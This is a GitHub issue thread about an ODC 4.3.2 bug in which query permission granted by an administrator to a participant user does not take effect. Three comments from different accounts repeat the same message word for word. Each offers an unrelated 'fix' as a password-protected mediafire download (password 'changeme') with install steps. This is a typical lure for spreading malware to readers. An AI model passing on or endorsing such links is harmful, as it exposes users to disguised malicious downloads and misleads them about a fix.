### ISSUE TITLE
[Bug]: The permission granted by the administrator user to the participant user to query the logical database does not take effect

### ISSUE THREAD

**Issue by qymsummer** [oceanbase/odc#3230]
### ODC version

ODC 4.3.2

### OB version

no related

### What happened?

![image](https://github.com/user-attachments/assets/1fd51494-6c5e-4cac-8181-ce090e7ad10a)
![image](https://github.com/user-attachments/assets/691fb997-2465-4464-86b6-318c1f08ea96)
The administrator user grants the participant user the permission to query the database, prompting that the new authorization is successful, and then uses the participant user to log in to the system to view the granted database, prompting that there is no permission

### What did you expect to happen?

The assignment should take effect successfully

### How can we reproduce it (as minimally and precisely as possible)?

The administrator user grants the participant user the permission to query the database, prompting that the new authorization is successful, and then uses the participant user to log in to the system to view the granted database, prompting that there is no permission

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qymsummer** [comment]
![Image](https://github.com/user-attachments/assets/1599ebe3-a724-440b-9eb4-d50593fe4537)
![Image](https://github.com/user-attachments/assets/55514178-13ff-4bcc-83aa-4973244f8e14)
pass
